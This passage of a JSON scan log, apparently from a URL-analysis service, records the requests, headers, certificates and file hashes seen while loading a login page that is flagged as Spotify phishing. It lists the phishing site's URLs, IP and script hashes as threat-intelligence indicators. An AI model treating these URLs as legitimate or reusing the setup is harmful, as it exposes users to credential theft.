providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":79790,"size_decoded":0,"mime_type":"image/gif","magic":"GIF image data, version 89a, 200 x 200","md5":"09b486c506e359cbabfaa9d224650cdd","sha1":"edfda10aab9d0a84b22f14fabc93c01e3e7f37c1","sha256":"a11ccd5dc1bf84e0ae935b7602b50fac0419466f1ad9343f4c078d2c4b50d9d5","sha512":"b34426cd90583fd153a1b2d3ede1698e3226a4543f7fe5c05946ace996032c8256b2717a58a55281345175e4293cbce556ba3173e0921c81d3e9d5ee794e9e38","ssdeep":"768:WXNXvutUZjDkc4a/IoDR6bxYJwPLFHhXaCkzdj7MmG8Ph9M26Z6dP+HeJ+Xvmt5/:W9Xf/l3LREAQpsCK7RMJ6tqgws+5","tlshash":"3573ad03c489fa47ec427479da225e5314e45fa62cbfec6f860bb67e067231741fa281","first_seen":"2023-11-04T01:15:44Z","last_seen":"2026-05-15T00:54:24.328466Z","times_seen":389,"resource_available":false,"data":null}},"time_used":67,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":16,"receive":51,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null}]}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/remember.png","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.462Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/remember.png HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: image/png\r\ncontent-length: 507\r\nserver: cloudflare\r\nx-accel-version: 0.01\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: \"1fb-63d01bb5d9d00\"\r\naccept-ranges: bytes\r\nx-powered-by: PleskLin\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\npriority: u=4,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=nYoCvVh0OqgwLuzritsDMlCyDPB4y9xH1Ka1DgfDUG0Qk%2BQvOM2tZ8UHFf2DPuzmeUFHLMh8nJvNf30aRwkuDJBSbm41F7igSkqwhxtUaPvz3qO8r7SnNmrAtj%2FnxpEA1xzF90tEA9nw1TF7M57pE4osShRj0iMUNpvoYIY%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c9941fed562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":507,"size_decoded":0,"mime_type":"image/png","magic":"PNG image data, 47 x 31, 8-bit/color RGBA, non-interlaced","md5":"5dfaa18f6f39a652440c204208b0b786","sha1":"3cd91179fad224a203aa6bca4a3d810150eb311f","sha256":"50969cc1f8a9b59d8f4d39fdd14064d5f06ffc919a9f1ab4046ac372e7ab7ffb","sha512":"556f52cd70d3d4340f7c6a69f49569fe430f912d0ab6c8dd3c3abb2a08cb44494f5d0d5386bf5c25ba6f5dff1f5df9587f856ffe4d551ca3cdf4961332958b0c","ssdeep":"","tlshash":"b5f054e18181adc5eb1cd0235de661537a7ee85807e21b1bb3197c741ce2a1ec3a17a2","first_seen":"2023-11-04T01:15:44Z","last_seen":"2026-05-15T00:54:24.329115Z","times_seen":382,"resource_available":false,"data":null}},"time_used":65,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":25,"receive":40,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null}]}},{"url":{"schema":"https","addr":"cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js","fqdn":"cdnjs.cloudflare.com","domain":"cloudflare.com","tld":"com"},"ip":{"addr":"104.17.25.14","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.464Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"cdnjs.cloudflare.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 13 Jan 2026 22:16:05 GMT","end":"Mon, 13 Apr 2026 23:15:55 GMT"},"fingerprint":{"sha1":"D9:00:47:77:A5:47:66:A1:6F:DA:EB:4B:BB:BF:67:49:BF:2C:A4:75","sha256":"07:A7:3E:4A:B2:9F:0A:07:6C:78:A7:7B:DC:2B:68:A1:84:7A:7F:1B:45:6C:71:8E:5E:79:F3:11:1A:6C:4F:62"}}},"request":{"raw":"GET /ajax/libs/jquery/3.7.1/jquery.min.js HTTP/1.1\r\nHost: cdnjs.cloudflare.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: application/javascript; charset=utf-8\r\ncontent-length: 27446\r\ncf-ray: 9d26c9945e098a18-ARN\r\naccess-control-allow-origin: *\r\ncache-control: public, max-age=30672000\r\ncontent-encoding: br\r\netag: \"64ed75bb-6b36\"\r\nlast-modified: Tue, 29 Aug 2023 04:36:11 GMT\r\ncross-origin-resource-policy: cross-origin\r\ntiming-allow-origin: *\r\nx-content-type-options: nosniff\r\ncf-cdnjs-via: cfworker/kv\r\nvary: Accept-Encoding\r\ncf-cache-status: HIT\r\nage: 115040\r\nexpires: Sat, 13 Feb 2027 12:39:41 GMT\r\naccept-ranges: bytes\r\nreport-to: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v4?s=%2BvHiqPpBlQ2SEGVOnKRFE%2FKmmUkvJN%2Bcg1B3h0SnF5Y0k2LhVKAZBW%2FjjhJQVWtMABT1nd9JFWO4Kr0cwseIhJd4pJjqRLJlLMH9mk1w85cUqdfowYwK9wUJnm2aoOlM6Um6KAnv\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nnel: {\"success_fraction\":0.01,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nstrict-transport-security: max-age=15780000\r\nserver: cloudflare\r\nalt-svc: h3=\":443\"; ma=86400\r\nX-Firefox-Spdy: h2\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"HSTS","description":"HTTP Strict Transport Security (HSTS) informs browsers that the site should only be accessed using HTTPS.","website":"https://www.rfc-editor.org/rfc/rfc6797#section-6.1","common_platform_enumeration":"","icon":"","categories":["Security"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":87533,"size_decoded":0,"mime_type":"application/javascript; charset=utf-8","magic":"JavaScript source, ASCII text, with very long lines (65447)","md5":"2c872dbe60f4ba70fb85356113d8b35e","sha1":"ee48592d1fff952fcf06ce0b666ed4785493afdc","sha256":"fc9a93dd241f6b045cbff0481cf4e1901becd0e12fb45166a8f17f95823f0b1a","sha512":"bf6089ed4698cb8270a8b0c8ad9508ff886a7a842278e98064d5c1790ca3a36d5d69d9f047ef196882554fc104da2c88eb5395f1ee8cf0f3f6ff8869408350fe","ssdeep":"1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr","tlshash":"3983f8df77ca702247ab30b9006f550bf276199d684d4400f159d8e9bcb8a4a827bf7e","first_seen":"2023-08-31T16:03:19Z","last_seen":"2026-05-26T05:19:31.098252Z","times_seen":161177,"resource_available":true,"data":null}},"time_used":84,"timings":{"blocked":25,"dns":0,"connect":8,"send":0,"wait":21,"receive":2,"ssl":25},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/cdn/jq.js","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.465Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/cdn/jq.js HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: application/javascript\r\nserver: cloudflare\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: W/\"68a953d4-5e466\"\r\nx-powered-by: PleskLin\r\ncontent-encoding: br\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\nvary: accept-encoding\r\npriority: u=3,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=JLQelQNvrPU%2Bxz4HihbJ0k2R01pl414XoVOwwW%2B2TAHgcAk8%2FMH934sNMcNPcGy%2B36YGrOspz6tvFBUzltMmXZ8cqqgQy44LrY7EpcZdtBegZMskxQ7NFsvNPSj742vYRUbI53Pf9BJS3ZAcHzfb%2BKhgBW7XheQzsmIMmOs%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c994280c562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]},{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]}],"data":{"size":386150,"size_decoded":0,"mime_type":"application/javascript","magic":"JavaScript source, ASCII text","md5":"ccf212eddc3506318c557182e8297ac6","sha1":"83cbb4c131ec92ddb4b4ac004a692ab5de57e22b","sha256":"7f8c83527958acc94204177932f4af82490579bc49a8410feda8fba5e8947815","sha512":"87ebad74c1e2b547c989593bf3cfa0c5ed905c10d0a599b7251ab948a2be061fbb076c623ff4135bc50a9e562d07619910213f1fe037548942962a59eadb1763","ssdeep":"6144:VpkhNVlJ+TC1lFhTzeKpTcYmD2zK8U1Js3Px+WK+N7TFyygRWL/IaLgeNTIPfgy8:kjTcYmD4I4Px+WK+N7TFyjeTiPf7Aqqt","tlshash":"1284f8d8f78d212e433231aa982f11ceb77dd175550444aafd4d987c28a482d83bbf7a","first_seen":"2025-01-29T01:32:25.483201Z","last_seen":"2026-05-25T15:06:05.610255Z","times_seen":707,"resource_available":true,"data":null}},"time_used":45,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":20,"receive":25,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null}]}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/jquery.js","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.466Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/jquery.js HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: application/javascript\r\nserver: cloudflare\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: W/\"68a953d4-ba5\"\r\nx-powered-by: PleskLin\r\ncontent-encoding: br\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\nvary: accept-encoding\r\npriority: u=3,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=PFOszzFtHbQO2qzm6HxAXSixW7e78BPLx06KoHnAcLzBfEHlg90PKH27Gwud73p5kVzLBzxhE4nnltT2BKnmpr9kagosQ41InjAlAUqhfTziu9In1Rl%2BZ3CBazErdbqMCNEJnt4qqbYIuceaYARleWCyhD7yuwnEtc4nkr8%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c9942813562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":2981,"size_decoded":0,"mime_type":"application/javascript","magic":"JavaScript source, ASCII text, with very long lines (2981), with no line terminators","md5":"fe615139ccfacd72791e537b6e9501ad","sha1":"ccb030e60ed991ad34609730763b2ca647a7cd2d","sha256":"af05ada543cc97d37d14d55fef0274cc9a4eaffd33b97484c29c49e31aabfb1b","sha512":"94426585509f0f756d2357435904a7215f09b44e7fc716aab966fb8b92334039a2cd40d4f9d2fa6e27ebad79ddb576fe0bcd471917a8df3611382e512e1df9c1","ssdeep":"","tlshash":"b4511994a1135ef6619ac0805d2f5f0e83d4bfb09c8ac4f6ed29ec2569cd0f4a41129c","first_seen":"2025-12-04T15:37:04.756389Z","last_seen":"2026-05-08T01:17:07.27635Z","times_seen":21,"resource_available":true,"data":null}},"time_used":44,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":20,"receive":24,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":true,"resource_type":"document","requested_by":"","date":"2026-02-23T12:39:34.840Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET / HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 302 Found\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: text/html; charset=UTF-8\r\nlocation: auth/login.php\r\nserver: cloudflare\r\nx-powered-by: PHP/8.2.30, PleskLin\r\ncf-cache-status: DYNAMIC\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=JBjaPHos4WajGxk9vgf%2BAJEt9UQltqHdO46X4ZrrRPPTNiz1KV0hxaaescWzVY7XvNmXNO6tzIKb4qCeVJoVje6hIfrhCKQHKvKVifzHjP26j6cySbIJz17bYWE3V0b2T2YY1xxRWOSoTCZkjq9sbSh2%2F6ujkOo3xOlXbpk%3D\"}]}\r\ncf-ray: 9d26c96b1c7c902d-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nX-Firefox-Spdy: h2\r\n\r\n","headers":null,"cookies":null,"status_code":"302","status_text":"Found","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]},{"name":"PHP:8.2.30","description":"PHP is a general-purpose scripting language used for web development.","website":"https://php.net","common_platform_enumeration":"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*","icon":"PHP.svg","categories":["Programming languages"]}],"data":{"size":12256,"size_decoded":0,"mime_type":"text/html; charset=UTF-8","magic":"","md5":"d41d8cd98f00b204e9800998ecf8427e","sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709","sha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sha512":"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e","ssdeep":"","tlshash":"","first_seen":"0001-01-01T00:00:00Z","last_seen":"2026-05-26T05:18:21.639032Z","times_seen":15713447,"resource_available":true,"data":null}},"time_used":6331,"timings":{"blocked":47,"dns":15,"connect":8,"send":0,"wait":6236,"receive":0,"ssl":20},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/logo.png","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.459Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/logo.png HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: image/png\r\ncontent-length: 3282\r\nserver: cloudflare\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: \"68a953d4-cd2\"\r\nx-powered-by: PleskLin\r\naccept-ranges: bytes\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\npriority: u=4,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=UucAu8lmdzZrx9FxaDcOXzUZcz4KbrIAL8qVeAbFL5BcFiDa9arIdZGkShTU91WxBokBZP5MoHAusyW%2FHe10O%2BrVr9UrnDEN6ryH3OlLsyHxPdf%2FNd1ZUdOIieOlA92zqHQJ8m4Egre%2FaQ%2BuXqMW%2Bq8clKJb%2BQFYVonH%2BQI%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c9941fe1562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]},{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service 